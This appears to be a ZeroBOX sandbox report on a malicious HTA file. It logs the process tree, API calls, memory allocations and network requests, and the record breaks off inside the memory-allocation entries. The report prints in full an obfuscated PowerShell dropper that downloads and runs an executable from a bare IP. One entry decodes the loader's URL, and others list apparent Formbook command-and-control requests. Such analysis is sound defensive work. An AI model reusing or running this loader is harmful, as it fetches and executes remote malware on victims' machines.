Summary | ZeroBOX

dion.hta

Gen1 Formbook Process Kill Suspicious_Script_Bin Generic Malware UPX CryptGenKey Antivirus Malicious Library Malicious Packer FindFirstVolume PE File Device_File_Check OS Processor Check PE32 DLL PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us June 5, 2024, 9:21 a.m. June 5, 2024, 9:24 a.m.
Size 11.3KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 24be5183dd56c3d08bae8625fba83aaa
SHA256 7d0ce5265370af5d96aaca0951fa1666eb0228709894dd9faa6bde3463483298
CRC32 3A1DB495
ssdeep 96:zH8vkfbark/NEWbg1r+DfjVZffjhifjs2yDWXZz2djQJc0q4rrvyrqTx:zU3vVorrr4rs2lXZz2djQJc0qerco
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\dion.hta

    1540
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAllBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQg){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822))) -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZqPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYxTCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,36760,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYKXZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};function SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;foreach($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRXAINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.exe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,36772,36761,36761,36763,36771,36770,36760,36764,36765,36760,36764,36762,36763,36760,36770,36771,36761,36833,36811,36828,36823,36761,36779,36831,36830,36825,36751,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rPdsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;

      2160

IP Address Status Action
154.215.72.110 Active Moloch
164.124.101.2 Active Moloch
198.23.201.89 Active Moloch
45.33.6.223 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: At line:1 char:795
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + function IoDuzQtSmLZDsM($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ){[IO.File]::WriteAl
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: lBytes($NQBZAVZqPrIkQg, $OPgEpjTaIklYKXZ)};function voHIPLrDYNfT($NQBZAVZqPrIkQ
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: g){if($NQBZAVZqPrIkQg.EndsWith((SYLmPANEWfVOJtmHRo @(36760,36814,36822,36822)))
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: -eq $True){rundll32.exe $NQBZAVZqPrIkQg }elseif($NQBZAVZqPrIkQg.EndsWith((SYLm
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: PANEWfVOJtmHRo @(36760,36826,36829,36763))) -eq $True){powershell.exe -Executio
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: nPolicy unrestricted -File $NQBZAVZqPrIkQg}elseif($NQBZAVZqPrIkQg.EndsWith((SYL
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: mPANEWfVOJtmHRo @(36760,36823,36829,36819))) -eq $True){misexec /qn /i $NQBZAVZ
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: qPrIkQg}else{Start-Process $NQBZAVZqPrIkQg}};function bLCRUDAbBUWM($IqJPBCxyWYx
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: TCQSt){$yWYjmjlURBEIl = New-Object (SYLmPANEWfVOJtmHRo @(36792,36815,36830,3676
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: 0,36801,36815,36812,36781,36822,36819,36815,36824,36830));[Net.ServicePointMana
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: ger]:: <<<< SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$OPgEpjTaIklYK
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: XZ = $yWYjmjlURBEIl.DownloadData($IqJPBCxyWYxTCQSt);return $OPgEpjTaIklYKXZ};fu
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: nction SYLmPANEWfVOJtmHRo($nzshJXeE){$tskKTS=36714;$COiODkHcfwmaYFp=$Null;forea
console_handle: 0x000000ef
1 1 0

WriteConsoleW

buffer: ch($yAxoMiZElttnpFen in $nzshJXeE){$COiODkHcfwmaYFp+=[char]($yAxoMiZElttnpFen-$
console_handle: 0x000000fb
1 1 0

WriteConsoleW

buffer: tskKTS)};return $COiODkHcfwmaYFp};function ZTRjGimAXeKUwvjzZO(){$usmWGjdJwVKwRX
console_handle: 0x00000107
1 1 0

WriteConsoleW

buffer: AINHG = $env:AppData + '\';$HhNblOezkUWRgv = $usmWGjdJwVKwRXAINHG + 'Auto%20R.e
console_handle: 0x00000113
1 1 0

WriteConsoleW

buffer: xe'; if (Test-Path -Path $HhNblOezkUWRgv){voHIPLrDYNfT $HhNblOezkUWRgv;}Else{ $
console_handle: 0x0000011f
1 1 0

WriteConsoleW

buffer: rPdsmVToBcNWuu = bLCRUDAbBUWM (SYLmPANEWfVOJtmHRo @(36818,36830,36830,36826,367
console_handle: 0x0000012b
1 1 0

WriteConsoleW

buffer: ,36764,36762,36796,36760,36815,36834,36815));IoDuzQtSmLZDsM $HhNblOezkUWRgv $rP
console_handle: 0x0000014f
1 1 0

WriteConsoleW

buffer: dsmVToBcNWuu;voHIPLrDYNfT $HhNblOezkUWRgv;};;;;}ZTRjGimAXeKUwvjzZO;
console_handle: 0x0000015b
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x00000167
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000173
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cedb8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf6b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cee38
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf778
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cef78
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001ceff8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x001cf338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
0xa917a
0x940f6
0x9f49b
0x96f87
0xa4587
0x96e24
0xa44fb
0x919a2
0xa69d7
0x915c5
0xa42b7
0xa9760
0x89e57
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757f33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 66 39 01 74 0b 8d 49 00 40 66 83 3c 41 00 75 f8
exception.instruction: cmp word ptr [ecx], ax
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xaa848
registers.esp: 2873412
registers.edi: 2873456
registers.eax: 0
registers.ebp: 2873412
registers.edx: 0
registers.ebx: 2877956
registers.esi: 2006581772
registers.ecx: 0
1 0 0
suspicious_features GET method with no User-Agent header; connection to a bare IP address (no hostname)
suspicious_request GET http://198.23.201.89/warm/Auto%20R.exe (this is the URL the loader's char-array decodes to — each code point minus 36714; the response is written to %AppData%\Auto%20R.exe and launched via Start-Process)
request GET http://198.23.201.89/warm/Auto%20R.exe
request POST http://www.3xfootball.com/fo8o/
request GET http://www.3xfootball.com/fo8o/?9LnGaVx=IhZyPQIGe6uK3zPwwQVGm4hCASyaX3xlW2eS79Xk6ut4afzj0LiRHBqZsEmyTx+18GfGhVOagMos+c9dx/PGjLGAfpOvJ7U3hUqpnKd0zHv/hQdGhX4G3JlCydyJ23yerjxn4r8=&9KJ=FLmtL7Haabh3IASW
request GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request POST http://www.3xfootball.com/fo8o/
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 1900544
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02740000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2160
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x71aa2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02517000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02515000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0251c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2160
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
